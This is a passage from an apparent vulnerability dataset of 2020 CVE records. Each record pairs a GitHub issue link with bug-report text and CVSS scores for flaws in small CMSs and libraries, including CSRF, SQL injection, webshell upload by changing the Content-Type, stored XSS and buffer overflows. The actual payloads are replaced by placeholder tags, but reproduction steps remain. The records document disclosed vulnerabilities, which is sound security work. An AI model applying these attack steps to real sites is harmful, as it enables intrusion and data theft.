  55969. "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/20",
  55970. "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/20",
  55971. "Repo_new": "pixelimity/pixelimity",
  55972. "Issue_Created_At": "2020-06-02T17:11:23Z",
  55973. "description": "CSRF Vulnerability NUMBERTAG Affected software: Pixelimity CMS Type of vulnerability: CSRF APITAG Site Request Forgery) Discovered by: Noth Author: Noth Description: Pixelimity CMS is vulnerable to persistent Cross Site Request Forgery attacks, which allow malicious users to inject HTML or scripts and forge user permissions to operate . Vulnerable URL: FILETAG Vulnerable parameter: password Proof of Concept NUMBERTAG Login as admin . FILETAG NUMBERTAG Locate URL FILETAG FILETAG NUMBERTAG Use Burpsuite to intercept packets FILETAG Original password NUMBERTAG Payload : FILETAG Later password NUMBERTAG Can success Change Passoword ! Test Video :",
  55974. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
  55975. "severity": "MEDIUM",
  55976. "baseScore": 6.8,
  55977. "impactScore": 5.9,
  55978. "exploitabilityScore": 0.9
  55979. },
  55980. {
  55981. "CVE_ID": "CVE-2020-23534",
  55982. "Issue_Url_old": "https://github.com/gopeak/masterlab/issues/254",
  55983. "Issue_Url_new": "https://github.com/gopeak/masterlab/issues/254",
  55984. "Repo_new": "gopeak/masterlab",
  55985. "Issue_Created_At": "2020-06-04T13:00:59Z",
  55986. "description": "SSRF exists in the background. \u8fd9\u91cc\u8f93\u5165\u5bf9bug\u505a\u51fa\u6e05\u6670\u7b80\u6d01\u7684\u63cf\u8ff0. Vulnerability file PATHTAG FILETAG POC: URLTAG FILETAG NUMBERTAG",
  55987. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55988. "severity": "CRITICAL",
  55989. "baseScore": 9.8,
  55990. "impactScore": 5.9,
  55991. "exploitabilityScore": 3.9
  55992. },
  55993. {
  55994. "CVE_ID": "CVE-2020-23572",
  55995. "Issue_Url_old": "https://github.com/source-trace/beescms/issues/6",
  55996. "Issue_Url_new": "https://github.com/source-trace/beescms/issues/6",
  55997. "Repo_new": "source-trace/beescms",
  55998. "Issue_Created_At": "2020-06-08T06:58:15Z",
  55999. "description": "There is a file upload vulnerability so that the webshell can be obtained. Let's take a look at the code FILETAG Because the system does not strictly filter and restrict the pictures uploaded by users, resulting in file upload vulnerabilities. From the code, it can be seen that only the size of the picture and the Content Type and so on are verified during the upload, so only need to modify the Content Type to bypass Upload. After the administrator logged in, open the following one page. FILETAG Upload FILETAG and grab the package to modify the Content Type to \"image/jpg\" FILETAG Then we can see that FILETAG was successfully uploaded. Then we access the uploaded file FILETAG",
  56000. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  56001. "severity": "HIGH",
  56002. "baseScore": 8.8,
  56003. "impactScore": 5.9,
  56004. "exploitabilityScore": 2.8
  56005. },
  56006. {
  56007. "CVE_ID": "CVE-2020-23580",
  56008. "Issue_Url_old": "https://github.com/DengyigeFeng/vuln/issues/1",
  56009. "Issue_Url_new": "https://github.com/dengyigefeng/vuln/issues/1",
  56010. "Repo_new": "dengyigefeng/vuln",
  56011. "Issue_Created_At": "2020-06-09T12:46:28Z",
  56012. "description": "APITAG NUMBERTAG remote code execution. poc\uff1a CODETAG detail NUMBERTAG Submit poc on the message board FILETAG APITAG background administrator set to display the message The default user name of the background administrator is admin, and the default password is NUMBERTAG isit FILETAG , set to display the message FILETAG APITAG code will be executed when you visit the message board page again FILETAG",
  56013. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56014. "severity": "CRITICAL",
  56015. "baseScore": 9.8,
  56016. "impactScore": 5.9,
  56017. "exploitabilityScore": 3.9
  56018. },
  56019. {
  56020. "CVE_ID": "CVE-2020-23630",
  56021. "Issue_Url_old": "https://github.com/Pandora1m2/zzcms201910/issues/1",
  56022. "Issue_Url_new": "https://github.com/pandora1m2/zzcms201910/issues/1",
  56023. "Repo_new": "pandora1m2/zzcms201910",
  56024. "Issue_Created_At": "2020-06-12T11:16:02Z",
  56025. "description": "APITAG Blind SQL injection vulnerability based on time. Software download address\uff1a FILETAG Operation environment requirements\uff1a Apache, IIS, etc PHP4 / PHP5 / PHP7 APITAG NUMBERTAG Here is a global filter at FILETAG ERRORTAG At first, you need to register an enterprise account at the website, /reg/userreg.htm Then, login in at FILETAG and jump to FILETAG APITAG APITAG FILETAG : APITAG CODETAG Function APITAG at APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG this Function filter \"'\", \" , \"/\", \"<\", \">\", \"select\", check.php call this Funtion but forget the parameter \u201cpassword\u201d in the cookies at line APITAG we can Sql injection in cookies Poc: Just login and modify the value of cookie then refresh(F5). APITAG APITAG APITAG",
  56026. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  56027. "severity": "HIGH",
  56028. "baseScore": 8.8,
  56029. "impactScore": 5.9,
  56030. "exploitabilityScore": 2.8
  56031. },
  56032. {
  56033. "CVE_ID": "CVE-2020-23631",
  56034. "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/11",
  56035. "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/11",
  56036. "Repo_new": "shadoweb/wdja",
  56037. "Issue_Created_At": "2020-06-12T14:12:55Z",
  56038. "description": "csrf&xss can get users cookie or other information \u2014\u2014 csrf+xss \u7ed3\u5408\u6f0f\u6d1e\u83b7\u53d6\u7528\u6237cookie\u4fe1\u606f. FILETAG exists Csrf Vulnerability. And we can write exp like this to trigger an xss. CSRF EXP\uff1a CODETAG FILETAG FILETAG \u5b58\u5728csrf\u8fd9\u4e2a\u90fd\u63d0\u8fc7\u4e86\uff0c\u901a\u8fc7\u914d\u5408\u53ef\u4ee5\u5b9e\u73b0\u8fd9\u6837\u7684\u653b\u51fb\u65b9\u5f0f\uff1a \u5168\u7ad9\u914d\u7f6e \u300b\u7edf\u8ba1\u4ee3\u7801 \u300b\u5b58\u5728xss\u653b\u51fb version / \u590d\u73b0\u73af\u5883\uff1a APITAG APITAG php NUMBERTAG",
  56039. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56040. "severity": "MEDIUM",
  56041. "baseScore": 6.1,
  56042. "impactScore": 2.7,
  56043. "exploitabilityScore": 2.8
  56044. },
  56045. {
  56046. "CVE_ID": "CVE-2020-23643",
  56047. "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/29",
  56048. "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/29",
  56049. "Repo_new": "cherry-toto/jizhicms",
  56050. "Issue_Created_At": "2020-06-15T14:56:07Z",
  56051. "description": "XSS vulnerability jizhicms NUMBERTAG Wechat reflected xss vulnerability. A xss vulnerability was discovered in jizhicms NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the msg parameter of PATHTAG Vulnerability file: APITAG ERRORTAG ERRORTAG APITAG APITAG FILETAG",
  56052. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56053. "severity": "MEDIUM",
  56054. "baseScore": 6.1,
  56055. "impactScore": 2.7,
  56056. "exploitabilityScore": 2.8
  56057. },
  56058. {
  56059. "CVE_ID": "CVE-2020-23644",
  56060. "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/28",
  56061. "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/28",
  56062. "Repo_new": "cherry-toto/jizhicms",
  56063. "Issue_Created_At": "2020-06-15T14:40:14Z",
  56064. "description": "XSS vulnerability. A xss vulnerability was discovered in jizhicms NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the msg parameter of ERRORTAG Vulnerability file: ERRORTAG ERRORTAG APITAG ERRORTAG FILETAG",
  56065. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56066. "severity": "MEDIUM",
  56067. "baseScore": 6.1,
  56068. "impactScore": 2.7,
  56069. "exploitabilityScore": 2.8
  56070. },
  56071. {
  56072. "CVE_ID": "CVE-2020-23653",
  56073. "Issue_Url_old": "https://github.com/zoujingli/ThinkAdmin/issues/238",
  56074. "Issue_Url_new": "https://github.com/zoujingli/thinkadmin/issues/238",
  56075. "Repo_new": "zoujingli/thinkadmin",
  56076. "Issue_Created_At": "2020-06-02T02:38:06Z",
  56077. "description": "Remote code execution vulnerability. Hi, this is Tencent Xcheck team. Our code safety check tool Xcheck has found several unserialize vulnerabilities in this project NUMBERTAG It leads to remote code execution. Here are the details NUMBERTAG PATHTAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG NUMBERTAG PATHTAG line NUMBERTAG ERRORTAG Prevent from abusing of this vulnerability, we don't provide proof of concept. We hope to repair it as soon as possible. From Xcheck Team",
  56078. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56079. "severity": "CRITICAL",
  56080. "baseScore": 9.8,
  56081. "impactScore": 5.9,
  56082. "exploitabilityScore": 3.9
  56083. },
  56084. {
  56085. "CVE_ID": "CVE-2020-23654",
  56086. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/10",
  56087. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/10",
  56088. "Repo_new": "navigatecms/navigate-cms",
  56089. "Issue_Created_At": "2020-06-17T14:24:49Z",
  56090. "description": "Cross Site Script Vulnerability on APITAG in APITAG NUMBERTAG Describe the bug / An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature Navigate / To Reproduce / Steps to reproduce the behavior: / Login into the panel NUMBERTAG Go to APITAG NUMBERTAG Go to Moudle APITAG NUMBERTAG Chose: Go to PATHTAG Go to PATHTAG Go to PATHTAG Go to PATHTAG Go to PATHTAG NUMBERTAG Click APITAG >> Insert Payload: '> APITAG NUMBERTAG Save: XSS alert Message! / Expected behavior / The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page / Impact / Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. / Screenshots / Info APITAG NUMBERTAG FILETAG E NUMBERTAG Chose go to: PATHTAG FILETAG FILETAG FILETAG E NUMBERTAG Chose go to: PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to: \"Go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to: PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to: PATHTAG FILETAG FILETAG / Desktop (please complete the following information): / OS: Windows Browser: All _I Hope you fix it ASAP_",
  56091. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  56092. "severity": "MEDIUM",
  56093. "baseScore": 5.4,
  56094. "impactScore": 2.7,
  56095. "exploitabilityScore": 2.3
  56096. },
  56097. {
  56098. "CVE_ID": "CVE-2020-23655",
  56099. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/11",
  56100. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/11",
  56101. "Repo_new": "navigatecms/navigate-cms",
  56102. "Issue_Created_At": "2020-06-17T14:57:52Z",
  56103. "description": "Cross Site Script Vulnerability on APITAG in APITAG NUMBERTAG APITAG the bug/ An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature Navigate /To Reproduce/ Steps to reproduce the behavior: APITAG into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Go to Moudle APITAG NUMBERTAG Chose: Go to PATHTAG Go to PATHTAG Go to PATHTAG Go to PATHTAG Go to PATHTAG NUMBERTAG Click APITAG >> Insert Payload: '> APITAG NUMBERTAG Save: XSS alert Message! APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page APITAG Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. APITAG Info APITAG NUMBERTAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG APITAG (please complete the following information):/ OS: Windows Browser: All I Hope you fix it ASAP",
  56104. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  56105. "severity": "MEDIUM",
  56106. "baseScore": 5.4,
  56107. "impactScore": 2.7,
  56108. "exploitabilityScore": 2.3
  56109. },
  56110. {
  56111. "CVE_ID": "CVE-2020-23656",
  56112. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/12",
  56113. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/12",
  56114. "Repo_new": "navigatecms/navigate-cms",
  56115. "Issue_Created_At": "2020-06-17T15:28:13Z",
  56116. "description": "Cross Site Script Vulnerability on APITAG in APITAG NUMBERTAG APITAG the bug/ An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature Navigate /To Reproduce/ Steps to reproduce the behavior: APITAG into the panel NUMBERTAG Go to APITAG NUMBERTAG Go to Moudle APITAG NUMBERTAG Chose: Go to PATHTAG Go to PATHTAG Go to PATHTAG NUMBERTAG Click APITAG >> Insert Payload: '> APITAG NUMBERTAG Save: XSS alert Message! APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page APITAG Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. APITAG Info APITAG NUMBERTAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG E NUMBERTAG Chose go to PATHTAG FILETAG FILETAG APITAG (please complete the following information):/ OS: Windows Browser: All _I Hope you fix it ASAP_",
  56117. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  56118. "severity": "MEDIUM",
  56119. "baseScore": 5.4,
  56120. "impactScore": 2.7,
  56121. "exploitabilityScore": 2.3
  56122. },
  56123. {
  56124. "CVE_ID": "CVE-2020-23658",
  56125. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2325",
  56126. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2325",
  56127. "Repo_new": "php-fusion/PHP-Fusion",
  56128. "Issue_Created_At": "2020-05-15T18:16:09Z",
  56129. "description": "Cloudflare XSS Bypass Cross Site Scripting Vulnerability in PHP Fusion NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability NUMBERTAG In Content Admin: Poll, Blog, ... etc NUMBERTAG In System Admin: Banner NUMBERTAG In Setting: Main To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Panel NUMBERTAG Insert Payload Example NUMBERTAG a. Go to PATHTAG b. Click add Poll c. Insert Payload: APITAG X APITAG d. Save Poll: XSS alert Message! Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots Info PHP Fusion in Update: FILETAG E NUMBERTAG Pools FILETAG FILETAG E NUMBERTAG Blogs FILETAG FILETAG E NUMBERTAG Banner FILETAG FILETAG E NUMBERTAG Main Settings FILETAG FILETAG Desktop (please complete the following information): OS: [e.g. iOS] Browser [e.g. chrome, safari] Version [e.g NUMBERTAG Smartphone (please complete the following information): OS: Windows Browser All Version",
  56130. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  56131. "severity": "MEDIUM",
  56132. "baseScore": 5.4,
  56133. "impactScore": 2.7,
  56134. "exploitabilityScore": 2.3
  56135. },
  56136. {
  56137. "CVE_ID": "CVE-2020-23659",
  56138. "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/1",
  56139. "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/1",
  56140. "Repo_new": "r0ck3t1973/xss_payload",
  56141. "Issue_Created_At": "2020-06-23T03:11:09Z",
  56142. "description": "Cross Site Script Vulnerability on \"connections\" in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"connections\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Change connections NUMBERTAG Insert Payload: '> APITAG NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG Info APITAG NUMBERTAG FILETAG NUMBERTAG Insert payload FILETAG NUMBERTAG ss alert mess FILETAG Desktop (please complete the following information): OS: Windows Browser Chorme Version: Version NUMBERTAG",
  56143. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  56144. "severity": "MEDIUM",
  56145. "baseScore": 5.4,
  56146. "impactScore": 2.7,
  56147. "exploitabilityScore": 2.3
  56148. },
  56149. {
  56150. "CVE_ID": "CVE-2020-23680",
  56151. "Issue_Url_old": "https://github.com/philips/text2pdf/issues/1",
  56152. "Issue_Url_new": "https://github.com/philips/text2pdf/issues/1",
  56153. "Repo_new": "philips/text2pdf",
  56154. "Issue_Created_At": "2020-06-20T14:10:37Z",
  56155. "description": "Array out of bounds. In the text2pdf.c file, the function APITAG does not check the maximum value of the parameter when operating on the array locations when can see the maximum value of the parameter should less than NUMBERTAG but we got NUMBERTAG APITAG APITAG APITAG APITAG APITAG FILETAG",
  56156. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  56157. "severity": "HIGH",
  56158. "baseScore": 7.8,
  56159. "impactScore": 5.9,
  56160. "exploitabilityScore": 1.8
  56161. },
  56162. {
  56163. "CVE_ID": "CVE-2020-23685",
  56164. "Issue_Url_old": "https://github.com/vtime-tech/188Jianzhan/issues/2",
  56165. "Issue_Url_new": "https://github.com/vtime-tech/188jianzhan/issues/2",
  56166. "Repo_new": "vtime-tech/188jianzhan",
  56167. "Issue_Created_At": "2020-06-21T09:29:24Z",
  56168. "description": "NUMBERTAG jianzhan NUMBERTAG FILETAG sql injection vulnerability. There is SQL injection vulnerability in the login office of APITAG which can bypass WAF and direct universal password without the need to verify the login background. FILETAG At line NUMBERTAG querying $user and $PWD using the SELECT statement does not do any effective filtering. So there is an SQL injection vulnerability and you can log in directly with the universal password APITAG But first, we need to bypass APITAG a NUMBERTAG waf protection. FILETAG We can use like instead of APITAG In the APITAG payload : APITAG APITAG enter any password\u3002 FILETAG",
  56169. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56170. "severity": "CRITICAL",
  56171. "baseScore": 9.8,
  56172. "impactScore": 5.9,
  56173. "exploitabilityScore": 3.9
  56174. },
  56175. {
  56176. "CVE_ID": "CVE-2020-23686",
  56177. "Issue_Url_old": "https://github.com/loadream/AyaCMS/issues/1",
  56178. "Issue_Url_new": "https://github.com/loadream/ayacms/issues/1",
  56179. "Repo_new": "loadream/ayacms",
  56180. "Issue_Created_At": "2020-06-21T14:04:19Z",
  56181. "description": "There is one CSRF vulnerability that can Change administrator password\u3002. After the administrator logged in, open the following page poc\uff1a APITAG Change administrator password CODETAG You can successfully change the administrator password to NUMBERTAG",
  56182. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  56183. "severity": "HIGH",
  56184. "baseScore": 8.8,
  56185. "impactScore": 5.9,
  56186. "exploitabilityScore": 2.8
  56187. },
  56188. {
  56189. "CVE_ID": "CVE-2020-23689",
  56190. "Issue_Url_old": "https://github.com/lxw1844912514/YFCMF/issues/2",
  56191. "Issue_Url_new": "https://github.com/lxw1844912514/yfcmf/issues/2",
  56192. "Repo_new": "lxw1844912514/yfcmf",
  56193. "Issue_Created_At": "2020-06-21T14:16:08Z",
  56194. "description": "YFCMF NUMBERTAG has a storage xss vulnerability. First log in as an administrator\uff0cthen find an article on the news page example\uff1a FILETAG FILETAG Then leave a message and enter the APITAG APITAG FILETAG FILETAG View in the background of the website FILETAG",
  56195. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  56196. "severity": "MEDIUM",
  56197. "baseScore": 4.8,
  56198. "impactScore": 2.7,
  56199. "exploitabilityScore": 1.7
  56200. },
  56201. {
  56202. "CVE_ID": "CVE-2020-23691",
  56203. "Issue_Url_old": "https://github.com/lxw1844912514/YFCMF/issues/1",
  56204. "Issue_Url_new": "https://github.com/lxw1844912514/yfcmf/issues/1",
  56205. "Repo_new": "lxw1844912514/yfcmf",
  56206. "Issue_Created_At": "2020-06-21T12:42:32Z",
  56207. "description": "YFCMF NUMBERTAG has rce vulnerability. When we built this website cms locally and visitt APITAG payload through post: get FILETAG get FILETAG",
  56208. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56209. "severity": "CRITICAL",
  56210. "baseScore": 9.8,
  56211. "impactScore": 5.9,
  56212. "exploitabilityScore": 3.9
  56213. },
  56214. {
  56215. "CVE_ID": "CVE-2020-23697",
  56216. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/463",
  56217. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/463",
  56218. "Repo_new": "monstra-cms/monstra",
  56219. "Issue_Created_At": "2020-05-22T17:32:50Z",
  56220. "description": "Cross Site Script Vulnerability on APITAG in Monstra version NUMBERTAG Hii, Team Monstra!!! Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel Monstra NUMBERTAG Go to APITAG NUMBERTAG Click APITAG New' > APITAG NUMBERTAG Insert Payload XSS: \"> APITAG '> APITAG // \"> APITAG APITAG APITAG load=alert NUMBERTAG APITAG NUMBERTAG Save and Exit NUMBERTAG Click APITAG new > xss alert message! Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots Infor Monstra version: FILETAG E NUMBERTAG payload xss: a. Creat new page: FILETAG b. click page: FILETAG c. xss alert mess: FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version: I Hope you fix it ASAP!!!!",
  56221. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  56222. "severity": "MEDIUM",
  56223. "baseScore": 5.4,
  56224. "impactScore": 2.7,
  56225. "exploitabilityScore": 2.3
  56226. },
  56227. {
  56228. "CVE_ID": "CVE-2020-23700",
  56229. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/319",
  56230. "Issue_Url_new": "https://github.com/lavalite/cms/issues/319",
  56231. "Repo_new": "lavalite/cms",
  56232. "Issue_Created_At": "2020-05-20T09:20:04Z",
  56233. "description": "Cross Site Scripting Vulnerability on APITAG Links\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Links\" feature. This was can be bypassed by using HTML event handlers, such as \"ontoggle\". To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click PATHTAG NUMBERTAG Select a function then press Edit NUMBERTAG Insert payload to Name: '> APITAG FILETAG NUMBERTAG Click APITAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS FILETAG Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site.",
  56234. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  56235. "severity": "MEDIUM",
  56236. "baseScore": 4.8,
  56237. "impactScore": 2.7,
  56238. "exploitabilityScore": 1.7
  56239. },
  56240. {
  56241. "CVE_ID": "CVE-2020-23705",
  56242. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/25",
  56243. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/25",
  56244. "Repo_new": "rockcarry/ffjpeg",
  56245. "Issue_Created_At": "2020-06-22T08:20:48Z",
  56246. "description": "global buffer overflow in function jfif_encode at APITAG Describe A global buffer overflow was discovered in ffjpeg. The issue is being triggered in function jfif_encode at APITAG Reproduce Tested in Ubuntu NUMBERTAG bit. Compile ffjpeg with address sanitizer as I changed CCFLAGS APITAG as: APITAG And do this command to reproduce this issue: APITAG poc is here URLTAG Expected behavior An attacker can exploit this vulnerability by submitting a malicious jpeg that exploits this issue. This will result in a Denial of Service APITAG and when the application attempts to process the file. ASAN Reports ERRORTAG",
  56247. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56248. "severity": "MEDIUM",
  56249. "baseScore": 6.5,
  56250. "impactScore": 3.6,
  56251. "exploitabilityScore": 2.8
  56252. },
  56253. {
  56254. "CVE_ID": "CVE-2020-23706",
  56255. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/7",
  56256. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/7",
  56257. "Repo_new": "brackeen/ok-file-formats",
  56258. "Issue_Created_At": "2020-06-26T12:25:34Z",
  56259. "description": "heap buffer overflow in function APITAG at APITAG Describe A heap buffer overflow was discovered in of_file_formats. The issue is being triggered in function APITAG at APITAG Reproduce test program CODETAG Tested in Ubuntu NUMBERTAG bit. Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG . APITAG Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG . Fuzzer & Testcase Fuzzer is AFL. Testcase is your testcase URLTAG in dir PATHTAG",
  56260. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56261. "severity": "MEDIUM",
  56262. "baseScore": 6.5,
  56263. "impactScore": 3.6,
  56264. "exploitabilityScore": 2.8
  56265. },
  56266. {
  56267. "CVE_ID": "CVE-2020-23707",
  56268. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/8",
  56269. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/8",
  56270. "Repo_new": "brackeen/ok-file-formats",
  56271. "Issue_Created_At": "2020-06-26T12:31:02Z",
  56272. "description": "heap buffer overflow in function APITAG at APITAG Describe A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Reproduce test program CODETAG Tested in Ubuntu NUMBERTAG bit. Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG . APITAG Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG . Fuzzer & Testcase Fuzzer is AFL. Testcase is your testcase URLTAG in dir PATHTAG",
  56273. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56274. "severity": "MEDIUM",
  56275. "baseScore": 6.5,
  56276. "impactScore": 3.6,
  56277. "exploitabilityScore": 2.8
  56278. },
  56279. {
  56280. "CVE_ID": "CVE-2020-23711",
  56281. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/20",
  56282. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/20",
  56283. "Repo_new": "navigatecms/navigate-cms",
  56284. "Issue_Created_At": "2020-06-19T07:54:57Z",
  56285. "description": "Blind SQL Injection Vulnerability Navigate CMS NUMBERTAG Expected behaviour Blind SQL injection (SQLi) enforced to an injection attack wherein an attacker can execute malicious Blind SQL used to collect information via URL encoded GET input category . Impact Depending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of the following attacks successfully: Reading, updating and deleting arbitrary data or tables from the database. Executing commands on the underlying operating system. Steps to reproduce Inject payload on the category via request: URLTAG Payload: APITAG APITAG / FILETAG Payload: APITAG APITAG / FILETAG Payload: APITAG APITAG / FILETAG",
  56286. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56287. "severity": "CRITICAL",
  56288. "baseScore": 9.8,
  56289. "impactScore": 5.9,
  56290. "exploitabilityScore": 3.9
  56291. },
  56292. {
  56293. "CVE_ID": "CVE-2020-23718",
  56294. "Issue_Url_old": "https://github.com/xujinliang/zibbs/issues/4",
  56295. "Issue_Url_new": "https://github.com/xujinliang/zibbs/issues/4",
  56296. "Repo_new": "xujinliang/zibbs",
  56297. "Issue_Created_At": "2020-06-18T07:51:59Z",
  56298. "description": "The function parameter FILETAG Directly trace to the FILETAG file. After analysis, this CMS handles the processing of each controller and operation through \u3010route\u3011, wherein the parameter route is the controller name and action name to be filled in in this GET request. FILETAG FILETAG A normal GET request would look like this URLTAG FILETAG And here the parameter \u3010route\u3011 is controllable, The value of the input parameter \u3010route\u3011 is processed as follows, The value of the parameter\u3010router\u3011is first split through APITAG as route=aaa/bbb, the aaa Is the controller name,bbb for the action of, It also makes conditional judgments about whether the controller and the action name exist, When the Controller name does not exist, it will directly output \"aaa Controller Controller does not exist NUMBERTAG as shown below FILETAG FILETAG This is for the parameter \u3010route\u3011, If the controller doesn't exist, The value of the input parameter \u3010route\u3011 is displayed 